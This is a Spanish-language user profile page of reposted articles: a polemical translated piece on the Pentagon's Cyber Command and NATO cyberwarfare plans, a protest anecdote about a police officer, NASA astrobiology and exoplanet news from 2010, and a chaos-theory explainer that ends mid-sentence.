P

PERDURABO666

Usuario (Argentina)

Primer post: 14 jul 2010Último post: 8 mar 2016
19
Posts
765
Puntos totales
183
Comentarios
E
El Pentágono se asocia con la OTAN para crear un sistema de
InfoporAnónimo12/2/2010

El Pentágono se asocia con la OTAN para crear un sistema de guerra ciberespacial global Un comunicado de la agencia Reuters afirma que USA tiene prevista este mes la activación de su Cibermando con capacidad operativa total y “preparado para enfrentarse a cualquier confrontación en el ciberespacio”. Con vistas a la implantación de un sistema planetario de guerra ciberespacial, el lanzamiento del primer mando militar múltiple del mundo -que incluye a las principales divisiones de las fuerzas del ejército usamericano, es decir, la aviación, la infantería, los marines y la armada- está coordinado con una iniciativa complementaria de la Organización del Tratado del Atlántico Norte (OTAN) en Europa. El pasado mes de septiembre, tras una década de existencia, el mando del Equipo Operativo Conjunto de la Red Global de Operaciones del Departamento de Defensa de USA fue disuelto oficialmente para pasar a integrarse en el nuevo Cibermando de USA (en inglés, CYBERCOM). Al anunciar dicha transición, el servicio de prensa del Pentágono señaló que el equipo operativo había estado perfeccionando “la mejor manera de operar en el campo de batalla del ciberespacio” con “la doble misión de dirigir ciberoperaciones ofensivas y defensivas” que en 2003 se le habían asignado al Mando Estratégico usamericano (en inglés, STRATCOM), bajo cuyo control estará ahora también el CYBERCOM. Un año después, en 2004, el Equipo Operativo Conjunto de la Red Global de Operaciones fue reconfigurado para que “asumiese el cometido ofensivo” de las actividades de defensa y ataque aquí arriba mencionadas. El general de las fuerzas aéreas Kevin Chilton, comandante del Mando Estratégico, presidió el 7 de septiembre la ceremonia de transición. El teniente general de infantería Carroll Pollett, director del Equipo Operativo de la Red Global de Operaciones desde 2008, pasará a ocuparse ahora únicamente de la Agencia de Sistemas de Información de la Defensa, en cuyas dependencias de Arlington (Virginia) tuvo lugar la ceremonia, si bien la Agencia de Sistemas de Información de la Defensa del Pentágono tiene previsto el traslado del CYBERCOM a Fort Meade (Maryland). Éstas son algunas de las declaraciones del general Pollett durante la celebración: “La información es un imperativo fundamental a la hora de proporcionar a nuestros soldados y a nuestros dirigentes nacionales los medios necesarios para la guerra. “El ciberespacio se ha convertido en un nuevo campo de batalla. “El ciberespacio ha adquirido una importancia similar a la que tienen tierra, mar y aire. Está claro que debemos defenderlo y volverlo operativo.” Su definición del ciberespacio como el “quinto espacio militar” forma parte de la retórica habitual de los funcionarios del Pentágono, quienes también lo denominan “quinto campo de batalla espacial”. Cuando los jefes de los ejércitos más poderosos de la historia hablan de añadir una nueva dimensión a las tradicionales -infantería, aviación, marina de guerra, marines y operaciones con satélites y misiles-, no sólo pretenden ampliar los preparativos de la guerra a un nuevo ámbito, sino que éste en buena parte domina a los demás. El 21 de mayo, dos semanas después de haberse convertido en el primer comandante del CYBERCOM y del lanzamiento de éste, el general Keith Alexander dijo que el Pentágono “depende de sus redes para el mando y el control, las comunicaciones, la inteligencia, las operaciones y la logística” y que la misión de su mando consiste en “impedir, detectar y defender a nuestra nación de las amenazas que surjan en el ciberespacio”. El general, que asimismo es director de la Agencia de la Seguridad Nacional del Departamento de Defensa, añadió que es necesario definir “reglas claras de confrontación” para la ciberguerra, que “sirvan tanto para tiempos de paz como de guerra”. En sus primeras declaraciones públicas desde que asumió el mando, Alexander se refirió a sus funciones en un contexto de guerra. Unos días antes, Kevin Chilton -director del Mando Estratégico- y William J. Lynn -secretario adjunto de Defensa- también habían declarado que la siguiente prioridad del CYBERCOM sería “desarrollar las reglas de confrontación de la ciberguerra”. En las raras ocasiones en que los medios de comunicación aluden a la creación por parte del Pentágono de un mando militar para ciberoperaciones sin precedente alguno, la palabra preferida con la que definen sus objetivos es “defensa”. En cambio, cuando los militares y el personal del Departamento de Defensa hablan entre sí, utilizan términos más directos: guerra, combate, tiempos de guerra, reglas de confrontación, campo de batalla, cibercampo de batalla. En cuanto al uso que suele darle Washington a la palabra defensa, vale la pena recordar que cuando en 1949 USA cambió el nombre del Departamento de la Guerra por el de Departamento de Defensa fue sólo una cuestión de semántica, ya que un año después el Departamento de Defensa se enzarzó en la guerra de Corea. El ejércitos usamericano no ha defendido su territorio continental desde 1812, cuando USA provocó una guerra contra Gran Bretaña al invadir Canadá. Tampoco ha defendido territorios usamericanos desde su mediocre actuación en Pearl Harbour en 1941 (Hawai pasó a ser un estado 18 años después) y en los combates posteriores en posesiones incluso más remotas: las Filipinas, Guam, la Isla de Wake y el atolón de Midway. Durante la Primera Guerra Mundial en Europa, inicialmente en Francia y después en la Rusia soviética desde 1917 a 1919, Washington llamó a sus fuerzas armadas lo que eran en realidad: tropas expedicionarias. En la guerra lanzada por USA y la OTAN contra Yugoslavia en 1999 y en la invasión de Iraq cuatro años después, el objetivo prioritario fue la destrucción de las redes eléctricas y las telecomunicaciones de ambos países. En el caso de Yugoslavia se utilizaron bombas de grafito para inutilizar el suministro eléctrico en la nación. Los recientes rumores sobre el uso del virus informático Stuxnet para atacar la central nuclear civil de Irán en Bushehr son un ejemplo de cómo están desarrollando el CYBERCOM para funciones ofensivas en tiempos de guerra. En un mundo que depende cada vez más de la tecnología de la información, los ciberataques han sustituido a los misiles de crucero y a las bombas de grafito. Además, con el proyecto Ataque Global Inmediato (Prompt Global Strike) del Pentágono para lanzar misiles balísticos e hipersónicos intercontinentales de crucero a cualquier lugar del mundo en un intervalo de respuesta de 60 minutos -que en el futuro se reducirá hasta ser prácticamente instantáneo- y con el desarrollo de bombarderos supersilenciosos a gran distancia, capaces de evitar los radares y las defensas antiaéreas y de penetrar en el interior del país al que se dirigen, la ostentación del poder global para declarar una ciberguerra dejaría al mundo indefenso ante el chantaje económico y los ataques de los yanquis. Los equivalentes extranjeros del Mando del Pentágono, el control, las comunicaciones, los ordenadores, los servicios de inteligencia, la vigilancia y el sistema de reconocimiento (C4ISR) quedarían neutralizados. No sólo Irán sería vulnerable, también Rusia y China. La edición de octubre-septiembre de Foreign Affairs, la revista del Consejo de Relaciones Exteriores, incluye un artículo de William Lynn, secretario adjunto de Defensa, titulado “Defending a New Domain: The Pentagon’s Cyberstrategy” [Cómo defender un nuevo dominio: la ciberestrategia del Pentágono], en el que se afirma que “El Pentágono ha construido poderosas defensas por capas en torno a redes militares y ha inaugurado el nuevo Cibermando para integrar las operaciones de ciberdefensa en todos los ejércitos“. En dicho artículo se enumeran los cinco componentes de la estrategia del Pentágono para la ciberguerra: El ciberespacio debe equipararse a la tierra, el mar y el aire en lo que respecta a la guerra; Cualquier posición defensiva debe ir más allá del mero mantenimiento del ciberespacio “limpio de enemigos” para incluir operaciones sofisticadas y precisas que permitan una reacción inmediata; Las ciberdefensas no deben limitarse al mundo informático, sino extenderse a las redes comerciales, controladas por el departamento de Seguridad Territorial [Homeland Security]. Con vistas a implantar un sistema eficaz de “alerta compartida” ante las amenazas se ha de posibilitar el establecimiento de ciberdefensas con aliados internacionales y El Departamento de Defensa debe prestar su ayuda para mantener e incrementar el dominio tecnológico usamericano y mejorar el proceso de adquisiciones para no quedarse rezagados ante la celeridad y la agilidad con que evoluciona la industria de la tecnología de la información (IT). Antes de la cumbre de la OTAN, que tendrá lugar en Portugal los días 19 y 20 de noviembre, el Departamento de Defensa tiene previsto publicar este otoño un documento de ciberestrategia, cuya aparición estará sincronizada con la puesta en funciones del CYBERCOM a pleno rendimiento. El 28 de agosto, el Washington Post publicó un artículo titulado “El Pentágono considera los ataques preventivos como parte de la estrategia de ciberdefensa”, que detallaba lo siguiente: El Departamento de Defensa está utilizando un “enfoque agresivo” de las ciberoperaciones, en el que “se incluyen acciones preventivas tales como la destrucción de la red de ordenadores de un adversario en ultramar”. Según se deduce de los documentos del presupuesto destinado al Pentágono, éste está desarrollando toda una serie de potenciales armamentísticos que le permitirán “atacar y explotar los sistemas de información del enemigo mediante el engaño, la negación, la afectación, la perturbación y la destrucción de tales sistemas”. El despliegue del software y del hardware para tales planes es “el siguiente paso lógico de la ciberestrategia general que William J. Lynn III, secretario adjunto de Defensa, presentó la semana pasada”, a saber, una “defensa activa”. En agosto, el general Keith Alexander, director del CYBERCOM, intervino en la conferencia LandWarNet 2010 en Tampa (Florida), cuyo tema era “Cómo alcanzar el ciberdominio mundial de los mandos conjuntos”. Reiteró en ella el argumento de que “el ciberespacio es ahora un escenario a considerar junto a los de tierra, mar y aire”. Con un tono mucho más inquietante, añadió: “Hemos de poseer potencialidad ofensiva para destruir en tiempo real a quien trate de atacarnos”. Por “defensa activa” debe entenderse la capacidad de iniciar los ataques preventivos no sólo contra piratas informáticos individuales, sino también contra redes enteras de ordenadores nacionales. El Washington Post citó las palabras de un alto funcionario no identificado del Pentágono, el cual sostuvo la misma posición: “Creo que tenemos claro que para asegurar la integridad de nuestras redes militares hemos de llegar hasta donde sea posible -una vez que sepamos de dónde viene la amenaza- para tratar de eliminar dicha amenaza allá donde podamos”, incluso si “al atacar el ordenador de un atacante en otro país infringimos su soberanía”. Un periodista del mismo diario advirtió que “el Pentágono tiene reglas vigentes de confrontación para la defensa de la red, tales como el derecho de defensa propia, pero puede que no sea tarea fácil establecer la línea que separa la defensa propia de la acción ofensiva”. Las reacciones a tales declaraciones y a otras parecidas no se han hecho esperar desde Rusia y China, aunque no de fuentes oficiales. El mes pasado, un sitio web ruso publicó un análisis bajo el título de “USA está preparado para tumbar la red de Internet en todo el mundo”, en el que se decía que “a partir del 1 de octubre [la fecha original en que se iba a poner en marcha el CYBERCOM como mando independiente], miles de piratas informáticos militares y de espías usamericanos iniciarán sus actividades de ciberguerra”. El autor recordó a sus lectores que en abril de este año Leon Panetta, director de la CIA, dio a conocer el proyecto de esta agencia para los próximos cinco años, CIA 2015, cuyo “segundo pilar” incluye “la inversión en tecnología para que la agencia incremente su alcance analítico y operacional y sea más eficiente. El personal de la agencia debe poder operar con eficacia y seguridad en un entorno de información mundial que cambia con suma celeridad. El plan incrementa el potencial de la CIA para la recopilación técnica por parte de su personal y proporciona herramientas avanzadas de software…" En mayo, el mismo mes en el que el CYBERCOM inició sus actividades, la Casa Blanca aprobó la Evaluación de la política ciberespacial [Cyberspace Policy Review] de este año. La fuente rusa señala también que “numerosas publicaciones en los medios usamericanos dan a entender que la reforma de las Ciberfuerzas de Defensa Nacional, así como la introducción de la doctrina y de la estrategia de la ciberguerra están a punto de completarse. En cuanto a la ciberestrategia, podemos suponer que sigue la línea habitual del concepto de liderazgo mundial que tiene USA” Hace unas semanas, el Global Times publicó un artículo de un investigador del Centro de Investigación y Desarrollo del Consejo de Estado de China en el que se leía lo siguiente: “Controlar el mundo mediante el control de Internet ha sido la estrategia dominante de USA” y “la estrategia de seguridad de información nacional de ese país ha evolucionado desde la prevención hasta la del ataque preventivo”. “El objetivo final de USA consiste en [ser capaz de] abrir y cerrar partes de Internet a voluntad”. El artículo afirma que en 2004 USA eliminó el nombre del dominio “ly” e inhabilitó todos los servicios de Internet en Libia y que “en mayo de 2009 Microsoft anunció en su sitio web que cancelaría el servicio de Windows Live Messenger para Cuba, Siria, Irán, Sudán y Corea del Norte, de conformidad con la legislación de USA”. El artículo del Washington Post citado más arriba añadía que el cierre de una página web saudí en 2006 “afectó colateral e involuntariamente a más de 300 servidores de Internet en Arabia Saudí, Alemania y Texas”. El autor chino afirmó, además, que “USA monopoliza las cinco áreas esenciales de la infraestructura de Internet“: Las grandes empresas de tecnología de la información (IT), que fabrican ordenadores de alto rendimiento, sistemas operativos, tecnologías de bases de datos, tecnologías de redes de la conmutación y bibliotecas de recursos de la información. En todo el mundo, alrededor del 92,3% de los ordenadores personales y el 80,4% de los superordenadores utilizan chips de Intel, mientras que el 91,8% de los ordenadores personales utilizan sistemas operativos de Microsoft y el 98% de la tecnología básica de los servidores está en manos de IBM y Hewlett-Packard. Por otro lado, el 89,7% del software de bases de datos lo controla Oracle y Microsoft y el 93,5% de la tecnología patentada esencial de las redes de conmutación está en manos de compañías usamericanas. Una vez que ha controlado la infraestructura de Internet y los sistemas de hardware y software, USA pasa ahora a controlar el contenido de Internet. El gobierno usamericano ha adoptado el macrocontrol y se ha centrado en la financiación para utilizar de forma activa a las grandes empresas de tecnología de la información con la finalidad de crear una infraestructura global de Internet que pueda manipular. Además, mencionó que el senador Joseph Lieberman, presidente del comité senatorial de Seguridad Interna y Asuntos Gubernamentales, presentó recientemente a sus colegas del Senado una propuesta de ley de Protección del Ciberespacio como un valor nacional que permitiría que el presidente “pudiese ordenar a Google, Yahoo y a otros motores de búsqueda que suspendiesen los servicios de Internet. "Y, además, otros proveedores de Internet en USA podrían pasar bajo el control del presidente cuando se produzca ‘una situación de urgencia’ en Internet." "Si esto ocurre, el presidente de USA tendría oficialmente el poder de abrir o cerrar Internet." Los temores de los expertos chinos se confirmaron tras las declaraciones del general de la fuerza aérea Michael Hayden -director de la Agencia de Seguridad Nacional desde 1999 a 2005, subdirector de la Inteligencia Nacional desde 2005 a 2006 y director de la CIA de 2006 a 2009-, quien el mes pasado afirmó, con palabras que luego difundió Reuters, que “el ciberterrorismo supone una amenaza de tal calibre que el presidente de USA debería tener autoridad para cerrar Internet en caso de ataque”. Exactamente dijo lo que sigue: “Mi opinión es que probablemente haya que legislar algún tipo de potestad para que el presidente tome medidas urgentes… cuando considere que deba tomarlas”. El Pentágono y la Casa Blanca no pretenden actuar solos en la puesta a punto de una estructura internacional de guerra cibernética. En mayo, poco después de la inauguración del CYBERCOM, los expertos usamericanos en seguridad de la ciberguerra se reunieron durante un simposio de dos días sobre control estratégico del ciberespacio celebrado en Omaha (Nebraska); entre ellos había “cibercomandantes de varios mandos usamericanos de combate, de la OTAN, de Japón y de Reino Unido”. En el mismo mes de mayo, el grupo de expertos de la OTAN, dirigido por la ex secretaria de Estado Madeleine Albright, publicó su informe OTAN 2010, en el cual se afirma que “la OTAN debería planificar la organización de un paquete de medidas de ciberdefensa que incluya elementos pasivos y activos”. Tres semanas después, un artículo del Sunday Times de Londres reveló que “en un informe del grupo de Albright se afirma que un ciberataque contra la infraestructura esencial de un país de la OTAN podría equivaler a un ataque armado, lo cual justificaría una respuesta. “‘Un ataque a gran escala contra los sistemas de mando y control de la OTAN o contra las redes de suministro de energía podría posiblemente llevar a medidas de defensa colectiva, según especifica el artículo 5′, afirmaron los expertos.” El artículo citaba además a un experto jurídico del Centro Cooperativo de Calidad de la Ciberdefensa de la OTAN, establecido en Estonia en 2008, el cual afirma que “debido a que el efecto de un ciberataque podría equivaler al de un ataque armado, no hay por qué volver a redactar los tratados que están en vigor”. Se estaba refiriendo a los artículos 4 y 5 de la Alianza: el 4 sirvió para justificar el transporte de misiles antibalísticos Patriot a Turquía durante los preparativos de la guerra contra Iraq en 2004 y el 5 para justificar la participación de la OTAN en la guerra de Afganistán; ambos podrían invocarse y activarse en caso de ciberataque. El artículo del Sunday Times añade: “La OTAN se toma muy en serio las advertencias de los servicios de inteligencia de toda Europa de que los ciberataques lanzados desde Rusia y China son una amenaza cada vez mayor. “La OTAN está sopesando el uso de la fuerza militar contra enemigos que lancen ciberataques contra los Estados miembros. “Este cambio se debe a una serie de ataques rusos de piratería informática contra miembros de la OTAN y a las advertencias de los servicios de inteligencia sobre la creciente amenaza en proveniencia de China." El mes pasado se celebró en Tallín, la capital de Estonia, el 13º Taller de Ciberdefensa. En el discurso que pronunció ante los asistentes, el ministro de Defensa, Jaak Aaviksoo, afirmó: “Los potentes sistemas de ciberseguridad nacional de los aliados construirán bloques de ciberdefensa de la OTAN de una estructura contundente”. En junio, en el centro de la OTAN en Estonia, país fronterizo con Rusia, se celebró una conferencia de cuatro días de duración bajo el título de “Cómo abordar los conflictos cibernéticos”. Melissa Hathaway, directora de ciberseguridad del Consejo Nacional de Seguridad de USA, pronunció un discurso que estableció la tónica de la conferencia. Gloria Craig, directora de Política Internacional de Seguridad del Ministerio de Defensa de Reino Unido, insistió en la urgencia de ampliar la capacidad de defensa frente a los ciberataques al afirmar que “en estos momentos, la OTAN no está preparada para un ciberataque global”. También en junio, unos “cien participantes de las principales empresas globales de tecnología de la información, del sector bancario, de la comunidad de la inteligencia, de la OTAN, la UE y otras instituciones” asistieron en Rumania a la conferencia “La ciberdefensa en el contexto de la nueva estrategia de la OTAN”, de la cual se hizo pública una declaración en la que se manifiesta que “la OTAN debe incrementar sus esfuerzos para responder al peligro de los ciberataques mediante la protección de sus propias comunicaciones y sistemas de mando, ayudando a los aliados a mejorar su capacidad para evitar ataques y recuperarse de ellos y a desarrollar un paquete de medidas de ciberdefensa…”. En agosto, la OTAN reveló que ha creado una División de Amenazas Emergentes contra la Seguridad “con el fin de ocuparse del creciente espectro de amenazas y riesgos inhabituales”, lo cual incluye las ciberoperaciones. “La División de Amenazas Emergentes contra la Seguridad unifica varias ramas del conocimiento ya existentes, pero hasta ahora separadas, en los cuarteles generales de la OTAN. La unificación de esta labor en una única División nos aportará mayor concentración y visibilidad.” Este mes, la Agencia de Consulta, Mando y Control (NC3Q) organizó una conferencia en la República Checa y la Agencia de Adquisición de Tecnologías Avanzadas de la Alianza anunció que “la OTAN está evaluando la inversión de hasta 930 millones de euros (1,3 mil millones de dólares) en 2011 y 2012 en proyectos de varios años para enfrentarse a los retos esenciales de la seguridad, tales como la ciberdefensa, el apoyo a la OTAN en Afganistán y a la seguridad marítima”. Un informe reciente divulgó que, en una entrevista con el Suddeutsche Zeitung, Anders Fogh Rasmussen, secretario general de la OTAN, afirmó que quería que la Alianza “ampliara la definición de los ataques que provocan la activación de la Alianza para que incluya los ciberataques” como parte del nuevo concepto estratégico al que adherirse en su cumbre del mes próximo. A mediados de septiembre William J. Lynn, segundo en la línea de mando del Pentágono, se encontraba en Bruselas para disertar ante el Consejo del Atlántico Norte, el principal órgano de gobierno de la OTAN, y de un comité de expertos en seguridad. Para movilizar a los militares aliados de Washington con vistas a la cumbre de noviembre, afirmó: “La OTAN tiene un escudo nuclear, está construyendo un escudo de defensa [con misiles] cada vez más poderoso, necesita un ciberescudo también… Las alertas compartidas de la guerra fría deben aplicarse a la ciberseguridad en el siglo XXI. Del mismo modo que nuestras defensas aéreas y nuestros misiles defensivos están vinculados, también debe estarlo nuestra ciberdefensa.” Cuando Lynn llegó a Bruselas, los mandos de USA y Europa estaban terminando los quince días de maniobras conjuntas de 2010 -”los sistemas militares de comunicaciones e información más importantes del mundo”- en el Centro conjunto de simulaciones multinacionales del área de entrenamiento de Grafenwoehr (Alemania). En total había 1400 participantes de 40 países: Alemania, Austria, Afganistán, Armenia, Albania, Azerbayán, Bulgaria, Bosnia, Canadá, Croacia, Dinamarca, Eslovaquia, Eslovenia, Estonia, España, Francia, Finlandia, Georgia, Hungría, Italia, Iraq, Irlanda, Kazajistán, Lituania, Macedonia, Moldava, Montenegro, Noruega, Países Bajos, Polonia, Portugal, Reino Unido, República Checa, Rumania, Serbia, Suecia, Turquía, Ucrania y USA. Un portavoz de los mandos de USA y Europa declaró lo siguiente a propósito de dicho evento: “Ahora tenemos una ‘operación’ en el Pacífico, la Operación Pacífico. Otra en USA, que utiliza a Sudamérica y Canadá para interconectar su red de sistemas de comunicación. Estas maniobras que estamos realizando aquí, en Grafenwoehr, tienen ramificaciones por todo el mundo y los principales mandos están poniendo a punto su propia versión.” Desde 2006, USA también ha dirigido las maniobras militares de la Operación África en ese continente, las “mayores maniobras de interoperabilidad en las comunicaciones de África” , primero bajo el mando conjunto de USA y Europa y, en fechas recientes, bajo el nuevo mando de USA y África. Las maniobras de la Operación África 2010 se realizaron en agosto en Ghana con la participación de 36 naciones africanas. La palabra adecuada para describir la red militar que el Pentágono ha construido en los últimos años es “global” (Worldwide), como lo evidencian las naciones participantes bajo el mando usamericano en la Operación Combinada de 2010 y en la Operación África 2010: 75 países, incluidos Afganistán e Iraq. Las maniobras de entrenamiento multinacional dirigidas por USA y las simulaciones de guerra se celebran de forma habitual y a igual escala en toda Europa. En este momento se celebra el segundo año de las maniobras Combatientes Unidos (Joint Warriors) -la mayor simulación de guerra de Europa- a poca distancia de la costa y bajo el cielo de Escocia, con 30 países, 10.000 soldados, 30 barcos de guerra, tres submarinos y 21 unidades aéreas y helicópteros. Maniobras militares de tamaño comparable se realizaron durante el verano en la zona de Asia-Pacífico, cuando USA dirigió las simulaciones de guerra de las 14 naciones del Pacífico, las mayores maniobras marítimas multinacionales del mundo, con la participación de 22.000 soldados, 34 barcos, cinco submarinos y más de 100 aviones. Las maniobras de la Operación Conjunta, que tuvieron lugar del 3 al 15 de septiembre en Alemania, incluyeron por primera vez un componente de ciberdefensa. Participantes de 26 países y dos organizaciones, la OTAN, y el Centro Cooperativo de Calidad de la Ciberdefensa, con sede en Estonia, participaron en la planificación de las ciberoperaciones en el Centro Conjunto de Simulaciones Multinacionales, en Grafenwoehr. Desde el fin de la guerra fría, y especialmente en la pasada década, el Pentágono ha expandido sus actividades por todo el mundo: bombardeos, guerras, invasiones, maniobras multinacionales y simulaciones de guerra, construcción de bases y golpes militares, despliegue de misiles y escudos, programas de entrenamiento y establecimiento de redes de transporte militar. Gracias a la expansión hacia el Este, la OTAN es hoy día el único bloque militar del mundo y, con la implantación hace dos años del mando de USA y África, USA ha alcanzado el control militar de dos continentes enteros. Tiene aliados en prácticamente todas las naciones de Europa, África, Oriente Próximo y Asia y ha ubicado nuevas bases y otras instalaciones militares en el este de Europa, África, Oriente Próximo, Asia, el Pacífico sur, Sudamérica: Kosovo, Bulgaria, Rumania, Hungría, Polonia, Djibouti, Seychelles, Iraq, Israel, Kuwait, Afganistán, Kirguistán, Australia y Colombia. Washington ha incrementado su presencia militar en varios continentes para alcanzar sus objetivos geopolíticos del siglo XXI. Con el fin de controlar el acceso y el transporte de los hidrocarburos, el Pentágono ha expandido su presencia en el Golfo Pérsico, en el Golfo de Guinea, en el Mar Negro y en las naciones cercanas al Mar Caspio. Con la reactivación en 2008 de su Cuarta Flota, USA se ha posicionado para dominar el Caribe, incluidos Colombia, Venezuela y Panamá en su orilla sur. USA está preparando un sistema global para interceptar misiles mediante el despliegue -directamente y con sus aliados- de los sistemas Patriot Advanced Capability-3, Standard Missile-3, Terminal High Altitude Area Defense y otros componentes de misiles-escudo en Polonia, Israel, Bahrain, Kuwait, Qatar, Emiratos Árabes Unidos, Japón, Corea del Sur y Australia, con el Mar Negro, el Mar Mediterráneo, el Mar Báltico y el Cáucaso Sur como futuros lugares previstos. El Pentágono no va a descansar hasta que logre dominar por completo el mundo y lo que hay por encima del mundo. A su superioridad militar en los ámbitos de tierra, mar y aire ahora está añadiendo el control del quinto campo de batalla: el ciberespacio. Texto original : Pentagon Partners With NATO To Create Global Cyber Warfare System Fuente: GlobalResearch.ca

10
0
E
El arma de un policia...el chupetin.
InfoporAnónimo5/14/2013

Sorprendió a todos los medios. Un policía se acercó a los puesteros que bloqueaban el ingreso a la terminal de ómnibus de Retiro y con una “paciencia de perros” trató de dialogar con los manifestantes. Los trataba de “mi amor” y les pedía que se subieran a la vereda, que dejaran de cortar el acceso a la estación. “Es un problema con el gobierno de la Ciudad, no con nosotros. Hay un montón de gente que tiene que viajar. Somos todos argentinos”, les dijo para convencerlos, mientras las cámaras de los canales de noticias registraban el diálogo. En eso, un manifestante le endilgó que era prepotente, que venía armado. “¿Querés ver mi arma?”, le preguntó. Y le regaló un chupetín. Acto seguido, alguien, en medio del tumulto estiró su brazo y se quedó con la golosina. El policía siguió negociando. Y llegó a buen puerto: unos 15 minutos después levantaron el corte Una reacción poco esperada, sobre todo para los que dicen que la policía sólo esta para reprimir... A continuación el video:

0
1
La NASA confirmará el jueves vida extraterrestre?
La NASA confirmará el jueves vida extraterrestre?
Ciencia EducacionporAnónimo12/2/2010

La NASA confirmará el jueves vida extraterrestre? Una alta expectativa se ha generado en el mundo científico, luego que la Nasa convocara a una rueda de prensa el jueves para "discutir hallazgos astrobiológicos", los cuales -aseguró- pueden tener "impacto en la búsqueda de evidencia sobre vida extraterrestre". El anuncio puso hoy a hervir los portales de internet y blogs dedicados a cuestiones del espacio, algunos de los cuales llegaron a especular que la agencia se apresta a anunciar el hallazgo de formas de vida en una de las lunas de Saturno. Los ponentes serán Mary Voytek, directora del programa de Astrobiología de la agencia, Felisa Wolfe-Simon, investigadora del US Geological Survey en Menlo Park, California, y Steven Benner, de la Foundation for Applied Molecular Evolution de Gainesville, en Florida. También hablarán la astrobióloga Pamela Conrad, de la base Goddard Space Flight Center de la NASA en Greenbelt, Maryland, y James Elser, profesor de la universidad estatal de Arizona. Según el blogger Jason Kottke, la lista de los panelistas es una evidencia de que la NASA está lista para anunciar rastros de vida en algún planeta cercano a la Tierra. "Si tengo que adivinar lo que la NASA anunciará el jueves -dijo Kottke-, diría que descubrieron arsénico en Titán o que quizás hayan detectado evidencia química" de bacterias o fotosíntesis en ese satélite de Saturno. Publimetro.com.mx

12
2
L
La NASA descubre atmósfera en una "superTierra"
Ciencia EducacionporAnónimo12/2/2010

La NASA descubre atmósfera en una "superTierra" Una "superTierra" es un planeta que es hasta tres veces más grande que la Tierra y un peso hasta diez veces superior, que orbita alrededor de una estrella fuera de nuestro sistema solar. (Recreación artística hecha por NASA de un planeta exterior) Un equipo de astrónomos de la NASA estableció que el exoplaneta GJ1214b, descubierto el pasado año y situado a 40 años luz de la Tierra, está cubierto por una fina capa de vapor de agua o hidrógeno, informó hoy la agencia espacial. Una "superTierra" es un planeta que es hasta tres veces más grande que la Tierra y un peso hasta diez veces superior, que orbita alrededor de una estrella fuera de nuestro sistema solar. Los investigadores del Centro de Astrofísica Harvard-Smithsonian en Cambridge, usaron los grandes telescopios LVT, del Observatorio Europeo Austral (ESO), en Chile, para observar este planeta extrasolar. Al pasar por delante de su estrella, los telescopios detectaron con su luz infrarroja algunos de los gases que recubren la atmósfera, pero todavía tienen que ahondar más en sus investigaciones. El equipo determinó que el GJ1214b está cubierto con un fina capa de vapor de agua o rodeado de una gruesa capa de nubes alta, que sugiere que el planeta tiene una composición helada o rocosa, y podría ser similar a Neptuno, aunque mucho más pequeño. "Esta es la primera superTierra que se sabe que tiene una atmósfera", dijo Jacob Bean, astrónomo y miembro del Centro Harvard-Smithsonian para Astrofísica en Cambridge (Massachusetts), aunque todavía no se puede determinar con exactitud de qué está formada la atmósfera. El GJ1214b fue descubierto en diciembre de 2009, es 2,7 veces el tamaño de Tierra y 6,5 veces su masa, observaciones anteriores han demostrado que tiene una baja densidad, por lo que los astrónomos creen que se trata de un cuerpo sólido con una atmósfera. El planeta orbita cerca de su estrella oscura, a una distancia de 0.014 unidades astronómicas (una unidad que es aproximadamente igual a la distancia media entre la Tierra y el Sol -aproximadamente 150 millones de kilómetros-) por lo que consideran que está demasiado cerca de su estrella como para ser habitable por cualquier forma de vida. Este técnica se ha utilizado para estudiar la atmósferas de planetas lejanos calientes como Júpiter, donde se encuentran gases como el hidrógeno, el metano y de vapor de sodio. En el caso de la súperTierra no se han detectado huellas químicas, sin embargo, esto no significa que no hay sustancias químicas presentes. El Observatorio SOFIA completa su primer viaje científico El Observatorio Estratosférico para Astronomía Infrarroja (SOFIA) completó hoy su primera misión científica para captar con sus potentes cámaras de infrarrojos otra dimensión del Universo. SOFIA es un observatorio que va a bordo de un avión Boeing 747SP de la NASA modificado para transportar un telescopio reflector de 2,5 metros construido por la agencia espacial alemana (DLR). Su objetivo es ayudar a los investigadores a entender mejor una serie de fenómenos astronómicos incluido el nacimiento de las estrellas y los planetas, cómo se forman sustancias orgánicas en el espacio interestelar, y cómo se alimentan y crecen los agujeros negros del espacio. El avión, con SOFIA a bordo, vuela a una altitud de entre 11 y 13 kilómetros y puede realizar observaciones en el espectro electromagnético infrarrojo en longitudes de onda de 0,3 y 1.600 micrones (equivalente a una millonésima parte de un metro). Su tamaño es superior al del telescopio Hubble, que desde el espacio ha proporcionado durante más de una década un cúmulo enorme de información sobre los planetas del Sistema Solar y las galaxias del Universo. SOFIA despegó el pasado 30 de noviembre de la pista de la base de las Fuerzas Aéreas en Palmdale (California) y ha realizado un vuelo de aproximadamente 10 horas. La NASA ya ha publicado las primeras imágenes de la nebulosa Orión realizadas por la el dispositivo FORCAST, una cámara infrarroja de espectro medio desarrollada la Universidad de Cornell. Su trabajo complementará las observaciones de los telescopios espaciales Hubble, Spitzer, James Webb, y Herschel, que ha encontrado un gran número de galaxias infrarrojas muy lejanas de las que hasta ahora se conocía muy poco en otras longitudes de onda. Fuente: Publimetro

11
12
E
El comportamiento caótico en la Fisica y el Efecto Mariposa
Ciencia EducacionporAnónimo2/27/2012

¿Qué es La Fisica Caótica? El Caos y los Fractales son parte de un tema mayor, la dinámica, rama de la física que empezó a mediados de 1600 cuando Isaac Newton descubrió las ecuaciones diferenciales, descubrió las leyes de movimiento y la gravitación general. Con estos elementos Newton resolvió problemas de dos cuerpos que interactúan por medio de la gravedad pero, lo que de verdad le llamaba la atención, era el movimiento de la Luna y su generalización conocida con el nombre de problema de los tres cuerpos. Las siguientes generaciones de matemáticos y físicos trataron problemas de tres cuerpos y notaron que resultaban mucho más difíciles que los problemas de dos cuerpos, hasta el punto de darlos como imposibles. Para Poincaré los sistemas venían determinados por un conjunto de condiciones iniciales, sin embargo estas nunca se podrían conocer con precisión absoluta y en consecuencia poco a poco se iría perdiendo el recuerdo de las mismas y los sistemas se harían impredecibles. Las leyes deterministas se cumplían pero era imposible la solución exacta de las ecuaciones que implicaban, así por ejemplo los sistemas planetarios, prototipo del máximo reloj cósmico, parecen evolucionar según las leyes de Kepler, que pueden deducirse por aplicación de las de Newton y la ley de gravitación, sin embargo estas leyes sólo son rigurosamente validas si no se consideran interacciones entre los diferentes planetas. No obstante. Estas ocurren y producen perturbaciones infinitesimales en el movimiento de los planetas. ¿Quién asegura que estas perturbaciones no acabarán a lo largo del tiempo por desequilibrar el conjunto y éste se volverá “caótico”? Henry Pointcaré Curiosamente las perturbaciones a que se hace referencia no son producto del azar, son consecuencia de las propias leyes de Newton Isaac Newton Las ideas de Poincaré quedaron algo olvidadas, aunque 